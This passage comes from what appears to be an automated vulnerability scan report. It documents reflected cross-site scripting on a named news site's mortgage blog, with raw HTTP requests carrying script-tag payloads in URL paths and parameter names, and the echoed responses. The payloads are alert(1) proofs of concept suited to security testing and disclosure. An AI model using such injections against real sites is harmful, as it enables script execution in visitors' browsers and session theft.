Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/0623a00\"><script>alert(1)</script>ebbc17fb5f6/feed/" />
...[SNIP]...

1.335. http://mortgage.ocregister.com/2010/06/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/06/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 528df"><script>alert(1)</script>67a958dbc2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 528df\"><script>alert(1)</script>67a958dbc2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/06/?528df"><script>alert(1)</script>67a958dbc2c=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/06/?528df\"><script>alert(1)</script>67a958dbc2c=1feed/" />
...[SNIP]...

1.336. http://mortgage.ocregister.com/2010/07/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/07/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3740"><script>alert(1)</script>9aa5f5044ac was submitted in the REST URL parameter 1. This input was echoed as e3740\"><script>alert(1)</script>9aa5f5044ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010e3740"><script>alert(1)</script>9aa5f5044ac/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010e3740\"><script>alert(1)</script>9aa5f5044ac/07/feed/" />
...[SNIP]...

1.337. http://mortgage.ocregister.com/2010/07/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/07/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 737f7"><script>alert(1)</script>3e0b1b344d0 was submitted in the REST URL parameter 2. This input was echoed as 737f7\"><script>alert(1)</script>3e0b1b344d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/07737f7"><script>alert(1)</script>3e0b1b344d0/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/07737f7\"><script>alert(1)</script>3e0b1b344d0/feed/" />
...[SNIP]...

1.338. http://mortgage.ocregister.com/2010/07/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/07/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0b75"><script>alert(1)</script>5819d4315a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c0b75\"><script>alert(1)</script>5819d4315a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/07/?c0b75"><script>alert(1)</script>5819d4315a4=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/07/?c0b75\"><script>alert(1)</script>5819d4315a4=1feed/" />
...[SNIP]...

1.339. http://mortgage.ocregister.com/2010/08/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/08/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4246e"><script>alert(1)</script>71ad8bebe0b was submitted in the REST URL parameter 1. This input was echoed as 4246e\"><script>alert(1)</script>71ad8bebe0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20104246e"><script>alert(1)</script>71ad8bebe0b/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20104246e\"><script>alert(1)</script>71ad8bebe0b/08/feed/" />
...[SNIP]...

1.340. http://mortgage.ocregister.com/2010/08/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/08/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e9c"><script>alert(1)</script>121b788efa9 was submitted in the REST URL parameter 2. This input was echoed as e3e9c\"><script>alert(1)</script>121b788efa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/08e3e9c"><script>alert(1)</script>121b788efa9/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/08e3e9c\"><script>alert(1)</script>121b788efa9/feed/" />
...[SNIP]...

1.341. http://mortgage.ocregister.com/2010/08/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/08/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed771"><script>alert(1)</script>1f1c98d951d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed771\"><script>alert(1)</script>1f1c98d951d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/08/?ed771"><script>alert(1)</script>1f1c98d951d=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 104455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/08/?ed771\"><script>alert(1)</script>1f1c98d951d=1feed/" />
...[SNIP]...

1.342. http://mortgage.ocregister.com/2010/09/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/09/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3029"><script>alert(1)</script>458883cf61d was submitted in the REST URL parameter 1. This input was echoed as b3029\"><script>alert(1)</script>458883cf61d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010b3029"><script>alert(1)</script>458883cf61d/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010b3029\"><script>alert(1)</script>458883cf61d/09/feed/" />
...[SNIP]...

1.343. http://mortgage.ocregister.com/2010/09/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/09/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84704"><script>alert(1)</script>12779ca8568 was submitted in the REST URL parameter 2. This input was echoed as 84704\"><script>alert(1)</script>12779ca8568 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/0984704"><script>alert(1)</script>12779ca8568/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/0984704\"><script>alert(1)</script>12779ca8568/feed/" />
...[SNIP]...

1.344. http://mortgage.ocregister.com/2010/09/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/09/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3512f"><script>alert(1)</script>0f889d943e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3512f\"><script>alert(1)</script>0f889d943e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/09/?3512f"><script>alert(1)</script>0f889d943e3=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/09/?3512f\"><script>alert(1)</script>0f889d943e3=1feed/" />
...[SNIP]...

1.345. http://mortgage.ocregister.com/2010/10/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/10/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7345b"><script>alert(1)</script>a5ceac7571b was submitted in the REST URL parameter 1. This input was echoed as 7345b\"><script>alert(1)</script>a5ceac7571b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20107345b"><script>alert(1)</script>a5ceac7571b/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:15 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20107345b\"><script>alert(1)</script>a5ceac7571b/10/feed/" />
...[SNIP]...

1.346. http://mortgage.ocregister.com/2010/10/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/10/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbcf4"><script>alert(1)</script>defd5ce1a69 was submitted in the REST URL parameter 2. This input was echoed as fbcf4\"><script>alert(1)</script>defd5ce1a69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/10fbcf4"><script>alert(1)</script>defd5ce1a69/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/10fbcf4\"><script>alert(1)</script>defd5ce1a69/feed/" />
...[SNIP]...

1.347. http://mortgage.ocregister.com/2010/10/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/10/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69fc7"><script>alert(1)</script>e6e9254e02c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69fc7\"><script>alert(1)</script>e6e9254e02c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/10/?69fc7"><script>alert(1)</script>e6e9254e02c=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/10/?69fc7\"><script>alert(1)</script>e6e9254e02c=1feed/" />
...[SNIP]...

1.348. http://mortgage.ocregister.com/2010/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/11/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb8f1"><script>alert(1)</script>d0a62076da8 was submitted in the REST URL parameter 1. This input was echoed as cb8f1\"><script>alert(1)</script>d0a62076da8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010cb8f1"><script>alert(1)</script>d0a62076da8/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
